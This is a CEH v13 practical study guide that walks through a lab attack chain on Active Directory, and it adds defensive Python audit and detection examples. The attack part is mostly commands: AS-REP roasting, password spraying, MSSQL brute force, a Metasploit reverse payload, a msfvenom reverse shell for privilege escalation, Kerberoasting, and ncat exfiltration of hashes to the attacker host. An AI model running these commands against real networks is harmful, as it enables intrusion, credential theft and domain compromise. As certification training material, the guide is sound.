CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
5. Active Directory (AD) Attacks

This module was recently added to the CEH V13 Practical.

Last updated 7 months ago

Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name

The initial scan in AD enumeration is crucial as it identifies the network structure, open ports, and services. This information helps ethical hackers map the AD environment, uncover vulnerabilities, and plan targeted attacks to assess security measures and identify potential weaknesses.

nmap 10.10.1.0/24

Port 88/TCP (kerberos-sec) and port 389/TCP (LDAP) are open on one host, which confirms that the DC IP address is 10.10.1.22.

Detailed scan

nmap -A -sC -sV 10.10.1.22

The script output gives us the domain name and the DC's FQDN.

Task 2: Perform AS-REP Roasting Attack

An AS-REP roasting attack targets user accounts in AD that do not require Kerberos pre-authentication, i.e. accounts with the DONT_REQ_PREAUTH flag set in userAccountControl. An attacker can send an AS-REQ for such an account without knowing the user's password.

The DC answers with an AS-REP whose encrypted part is keyed with the user's password hash; the attacker captures that response and feeds it to offline password-cracking tools such as Hashcat or John the Ripper. By guessing candidate passwords until one decrypts the response, the attacker recovers the user's password.

python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22
  • GetNPUsers.py: Python script to retrieve AD user information.

  • CEH.com/: Target AD domain.

  • -no-pass: Do not prompt for a password; the script simply tries each listed account without pre-authentication and reports the ones the DC accepts.

  • -usersfile /root/ADtools/users.txt: Path to the file with the user account list.

  • -dc-ip 10.10.1.22: IP address of the DC to query.

In Kali, the Impacket scripts are installed as impacket-<script>, so the same check looks like this (shown here with a different example domain and DC IP):

impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt  htb.local/
impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/

We can observe that the user Joshua has DONT_REQUIRE_PREAUTH set. As this user is vulnerable to AS-REP roasting, we obtain Joshua's password hash. Copy that hash and save it as joshuahash.txt. Execute the command echo '[HASH]' > joshuahash.txt.

Now crack the hash with John the Ripper, which auto-detects the krb5asrep format:

john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt
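An added example (not part of the lab or of Impacket) showing what GetNPUsers.py is actually testing: the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl. The directory entries and account names below are constructed; the LDAP filter is the standard query a defender can run to find the same accounts and clear the flag.

```python
# Added example: audit AS-REP roastable accounts from userAccountControl.
# The directory entries below are constructed sample data, not lab output.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",   # the bit AS-REP roasting depends on
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# LDAP filter that returns the same accounts directly from the DC
# (1.2.840.113556.1.4.803 is the bitwise-AND matching rule; 4194304 = 0x400000).
LDAP_FILTER_ASREP = "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(entries):
    """sAMAccountNames that are enabled and do not require pre-authentication."""
    hits = []
    for e in entries:
        uac = e["userAccountControl"]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(e["sAMAccountName"])
    return hits


def fixed_uac(value):
    """Remediated value: the same flags with DONT_REQ_PREAUTH cleared."""
    return value & ~DONT_REQ_PREAUTH


# Constructed sample entries: Joshua mirrors the lab finding, oldsvc is disabled.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "Joshua", "userAccountControl": 0x400000 | 0x10000 | 0x200},
    {"sAMAccountName": "Mark", "userAccountControl": 0x200},
    {"sAMAccountName": "oldsvc", "userAccountControl": 0x400000 | 0x2 | 0x200},
]

if __name__ == "__main__":
    for e in SAMPLE_ENTRIES:
        print(e["sAMAccountName"], decode_uac(e["userAccountControl"]))
    print("AS-REP roastable:", asrep_roastable(SAMPLE_ENTRIES))
```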

Task 3: Spray Cracked Password into Network using CrackMapExec.

Using CrackMapExec for password spraying involves leveraging its capabilities to automate the process. For instance, if "cupcake" is a cracked password, CME can be used to test this password against numerous user accounts and services across a network. This approach helps identify other accounts that may be using the same password, facilitating further penetration testing or security assessments.

Spray the password against whichever services the Nmap scan showed running on the targets.

RDP Password spraying

cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p "cupcake"
  • rdp: Targets the Remote Desktop Protocol (RDP) service.

  • 10.10.1.0/24: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0.

  • -u /root/ADtools/users.txt: Specifies the path to the file containing user accounts for authentication.

  • -p "cupcake": Password which we cracked using AS-REP Roasting to test against the RDP service on the specified hosts.

We find that user Mark is using the same password cupcake on host 10.10.1.40. We can try to connect to RDP as user mark.
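The spray above leaves a recognisable trace on the targets: one source address failing logons against many different accounts in a short window, then one success. This added detection example (not part of the lab) runs that logic over constructed Windows Security events; the field layout, timestamps and account names are our own, and 10.10.1.13 is the lab's attacker address.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): time, event id, source IP,
# target account, logon type. 4625 = failed logon, 4624 = successful logon,
# logon type 10 = RemoteInteractive (RDP), 3 = network.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01,4625,10.10.1.13,alice,10
2024-05-01T10:00:02,4625,10.10.1.13,bob,10
2024-05-01T10:00:02,4625,10.10.1.13,carol,10
2024-05-01T10:00:03,4625,10.10.1.13,dave,10
2024-05-01T10:00:04,4625,10.10.1.13,erin,10
2024-05-01T10:00:05,4624,10.10.1.13,mark,10
2024-05-01T10:07:00,4625,10.10.1.50,alice,10
2024-05-01T10:09:00,4625,10.10.1.50,alice,10
"""


def parse_events(text):
    """Parse the constructed CSV-style lines into dicts."""
    events = []
    for line in text.splitlines():
        ts, eid, src, user, ltype = line.split(",")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(eid),
                       "src": src, "user": user.lower(), "type": int(ltype)})
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5, logon_types=(3, 10)):
    """Flag sources with failed logons against >= min_users distinct accounts
    inside `window`, and list accounts that then logged on successfully from
    the same source within that window (the spray's hits, e.g. Mark in the lab)."""
    by_src = defaultdict(list)
    for e in events:
        if e["type"] in logon_types:
            by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(fails):
            end = first["ts"] + window
            users = {e["user"] for e in fails[i:] if e["ts"] <= end}
            if len(users) >= min_users:
                hits = sorted({e["user"] for e in evs
                               if e["id"] == 4624 and first["ts"] <= e["ts"] <= end})
                findings[src] = {"distinct_users": len(users), "successes": hits}
                break
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible password spray from {src}: {f}")
```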

Task 4: Perform Post-Enumeration using PowerView

PowerView is a PowerShell tool designed for network and AD enumeration. It helps security professionals gather detailed information about user accounts, groups, computers, and domain trusts, and is used to identify potential security weaknesses and misconfigurations in an AD environment. It is commonly employed in penetration testing and red team operations, and it runs on Windows.

Launch PowerShell from the Windows search box. To load the script (which you should already have downloaded), either dot-source it with . .\PowerView.ps1 or use Import-Module as shown below.

powershell -EP Bypass

The -EP Bypass switch starts PowerShell with the execution policy set to Bypass so that the unsigned script can be loaded; it does not disable antivirus, which may still quarantine PowerView.ps1 on a protected host. With that done, load the script:

Import-Module .\PowerView.ps1

Execute Get-NetComputer command in PowerShell. This command will display all the information related to computers in AD. It lists all computer objects in AD, which can help in identifying network targets and mapping the AD environment.

Get-NetComputer

Execute Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.

Get-NetGroup

Execute command Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships. It helps identify potential targets and understand the AD environment better.

Get-NetUser

We found a new user SQL_srv, who has some high privileges and could be useful for further attacks.

Here are some other listed commands that you can use with PowerView.ps1 for enumeration:

  • Get-NetOU - Lists all organizational units (OUs) in the domain.

  • Get-NetSession - Lists active sessions on the domain.

  • Get-NetLoggedon - Lists users currently logged on to machines.

  • Get-NetProcess - Lists processes running on domain machines.

  • Get-NetService - Lists services on domain machines.

  • Get-NetDomainTrust - Lists domain trust relationships.

  • Get-ObjectACL - Retrieves ACLs for a specified object.

  • Find-InterestingDomainAcl - Finds interesting ACLs in the domain.

  • Get-NetSPN - Lists service principal names (SPNs) in the domain.

  • Invoke-ShareFinder - Finds shared folders in the domain.

  • Invoke-UserHunter - Finds where domain admins are logged in.

  • Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.

Task 5: Perform Attack on MSSQL service

xp_cmdshell is a SQL server stored procedure enabling command shell execution. Misconfigured xp_cmdshell can lead to arbitrary command execution, data exfiltration, and potential network compromise, posing significant security risks. Proper configuration and security measures are crucial to mitigate these risks.

The service runs on port 1433 and we will brute force the password first.

Save the username SQL_srv in a text file named user.txt (for example with pluma user.txt).

Now brute-force the MSSQL password:

hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql

We have successfully cracked the password for SQL_srv, which is "batman". Next, we will attempt to log into the service using mssqlclient.py.

python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433

Now, execute the following command.

SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';

The query returns a value of 1, indicating that xp_cmdshell is enabled on the server, so we can use Metasploit to exploit this service. The module needs the SQL credentials and, for the reverse payload, the attacker address as LHOST.

use exploit/windows/mssql/mssql_payload
set RHOST 10.10.1.30
set USERNAME SQL_srv
set PASSWORD batman
set DATABASE master
set LHOST 10.10.1.13
exploit

Once the exploitation completes, we get a Meterpreter session. You can drop to a command shell by typing shell.

Task 6: Perform Privilege Escalation

WinPEASx64.exe is a tool for Windows privilege escalation, identifying misconfigurations and vulnerabilities for potential exploitation.

The Unquoted Service Path vulnerability in the RunOnce registry key arises when a Windows service path lacks proper quotation marks and contains spaces, enabling attackers to execute arbitrary code with elevated privileges during system startup.

It is assumed that you still have the shell from last task.

Move to C:\Users\Public\Downloads using cd and execute the command powershell.

Now we need to host winPEASx64.exe on the attacker machine using Python. Open a new terminal, type sudo su, press Enter, and use toor as the password. Then execute cd /root/ADtools.

Type python3 -m http.server and press Enter to host the winPEASx64.exe file.

Get back to the shell terminal and type the following (in PowerShell, wget is an alias of Invoke-WebRequest, so -OutFile sets the name of the saved file):

wget http://10.10.1.13:8000/winPEASx64.exe -OutFile winpeas.exe

Once winpeas.exe is downloaded, execute it with ./winpeas.exe

./winpeas.exe

Once the execution is complete, observe the output. Here, winPEAS reports a file named file.exe in C:\Program Files\CEH Services whose path is unquoted, which can be exploited for privilege escalation.

Open a new terminal with root privileges using the command sudo su and toor as password and create a payload.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=8888 -f exe > /root/ADtools/file.exe

Go to another terminal and type nc -nvlp 8888 and press Enter

nc -nvlp 8888

Get back to our shell terminal and move to C:\Program Files\CEH Services. Execute the command

cd ../../.. ; cd "Program Files/CEH Services"

Execute the command.

move file.exe file.bak ; wget http://10.10.1.13:8000/file.exe -OutFile file.exe

Switch to the Windows Server 2019 (AD) machine, assuming we are the victim now. Restart the machine by hovering over Power and Display button and click Reset/Reboot button present at the toolbar located above the virtual machine and log in with the username SQL_srv and password "batman." We will get a shell on our Parrot OS.

Task 7: Perform Kerberoasting Attack

Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract service ticket (TGS) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). Service tickets are requested from the DC for these SPNs; each ticket is encrypted with the service account's password hash, so it can be cracked offline to reveal the account's password. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication.

We assume that we already have a shell on a Windows system, i.e. access to the AD environment.

In the netcat shell, execute the powershell command to launch PowerShell, then move to C:\Users\Public\Downloads with

cd ../.. ; cd Users\Public\Downloads

Now, we will be downloading Rubeus and netcat. Execute the command

wget http://10.10.1.13:8000/Rubeus.exe -OutFile rubeus.exe ; wget http://10.10.1.13:8000/ncat.exe -OutFile ncat.exe

Type cd ../.. ; cd Users\Public\Downloads and press Enter to move into the Downloads folder (Windows PowerShell 5.1 does not accept && as a statement separator; use ; instead).

Execute the command

rubeus.exe kerberoast /outfile:hash.txt

After kerberoasting, the password hash for DC-Admin is saved in the hash.txt file.

To get that hash file on the attacker machine, we will be using netcat. Open a new terminal, type sudo su and press Enter; use toor as password. Then execute the command

nc -lvp 9999 > hash.txt

In the shell terminal, execute the following command. It is wrapped in cmd /c because PowerShell does not support the < input-redirection operator.

cmd /c "ncat.exe -w 3 10.10.1.13 9999 < hash.txt"

Get back to the netcat listener terminal and press Enter to save the file.

Now, we will be using HashCat to crack the password hash

hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt
  • -m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 TGS-REP etype 23 (RC4-HMAC), the format Rubeus kerberoast writes by default (the AS-REP hashes from Task 2 would need mode 18200 instead).

  • --force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.

  • -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.

  • hash.txt: The input file containing the hashes to crack.

  • /root/ADtools/rockyou.txt: The wordlist file used for the attack.

After completion, we get the password advanced!. As DC-Admin has high privileges on the domain, we can use this password for further attacks.
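The hashes produced in Task 2 (GetNPUsers.py, cracked with john) and Task 7 (Rubeus kerberoast, cracked with hashcat -m 13100) are different formats that need different cracker modes. This added example (not part of the lab, Impacket or Rubeus) parses such lines, reports the matching hashcat mode and extracts the exposed account and SPN for triage; the hash lines below are constructed with dummy hex.

```python
import re

# Added example: classify Kerberos hash lines from AS-REP roasting and
# Kerberoasting. Regexes cover the hashcat/john line layouts for etypes 23
# (RC4) and, for TGS-REP, 17/18 (AES) with or without the *spn* segment.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(\d+)\$)?([^@]+)@([^:]+):([0-9a-fA-F]+)\$([0-9a-fA-F]+)$")
TGS_RE = re.compile(
    r"^\$krb5tgs\$(\d+)\$(?:\*([^$]+)\$([^$]+)\$([^*]+)\*\$|([^$]+)\$([^$]+)\$)"
    r"([0-9a-fA-F]+)\$([0-9a-fA-F]+)$")

# hashcat modes: AS-REP etype 23 = 18200; TGS-REP etype 23/17/18 = 13100/19600/19700
HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100,
                 ("tgs", 17): 19600, ("tgs", 18): 19700}


def classify_kerberos_hash(line):
    """Describe one hash line, or return None if it is not AS-REP/TGS-REP."""
    line = line.strip()
    m = ASREP_RE.match(line)
    if m:
        etype = int(m.group(1) or 23)   # john-style lines omit the etype; 23 is RC4
        info = {"kind": "asrep", "etype": etype, "account": m.group(2),
                "realm": m.group(3), "spn": None}
    else:
        m = TGS_RE.match(line)
        if not m:
            return None
        etype = int(m.group(1))
        info = {"kind": "tgs", "etype": etype, "account": m.group(2) or m.group(5),
                "realm": m.group(3) or m.group(6), "spn": m.group(4)}
    info["hashcat_mode"] = HASHCAT_MODES.get((info["kind"], etype))
    return info


def summarize(lines):
    """Group recognised hash lines by hashcat mode: {mode: [accounts]}."""
    out = {}
    for line in lines:
        info = classify_kerberos_hash(line)
        if info and info["hashcat_mode"]:
            out.setdefault(info["hashcat_mode"], []).append(info["account"])
    return out


# Constructed sample lines (dummy hex, lab-style account names).
SAMPLE_LINES = [
    "$krb5asrep$23$Joshua@CEH.COM:0123456789abcdef0123456789abcdef$00112233aabbccdd",
    "$krb5tgs$23$*DC-Admin$CEH.COM$MSSQLSvc/sql.ceh.com:1433*$0123456789abcdef0123456789abcdef$00112233aabbccdd",
    "$krb5tgs$18$svc_web$CEH.COM$0123456789abcdef01234567$00112233aabbccdd",
    "not-a-kerberos-hash",
]

if __name__ == "__main__":
    for mode, accounts in summarize(SAMPLE_LINES).items():
        print(f"hashcat -m {mode}: {accounts}")
```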
